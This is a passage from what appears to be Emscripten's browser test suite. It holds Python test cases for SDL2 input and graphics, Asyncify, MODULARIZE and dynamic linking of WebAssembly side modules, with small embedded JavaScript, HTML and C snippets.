event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
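# (Illustrative sketch only, not the exact library used here: such a JS library method typically
#  wraps its asynchronous work in Asyncify.handleSleep, roughly
#      sync_tunnel: function(value) {
#        return Asyncify.handleSleep(function(wakeUp) {
#          setTimeout(function() { wakeUp(value); }, 0);
#        });
#      },
#  the real implementation used by this test lives in browser/async_returnvalue.js.)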
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // an erroneous module capture would load this and cause a timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
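# Delete the .wasm after building so the fetch fails, and check that the promise returned by the
# MODULARIZE factory rejects with the expected abort message.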
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# an amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl', 'test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
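# Load a SIDE_MODULE at runtime by listing it in Module.dynamicLibraries from a pre-js, both on the
# main thread and when proxied to a worker.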
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
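# Preload a 30MB file with only 16MB of initial memory, forcing the heap to grow while the runtime
# is still starting up.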
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
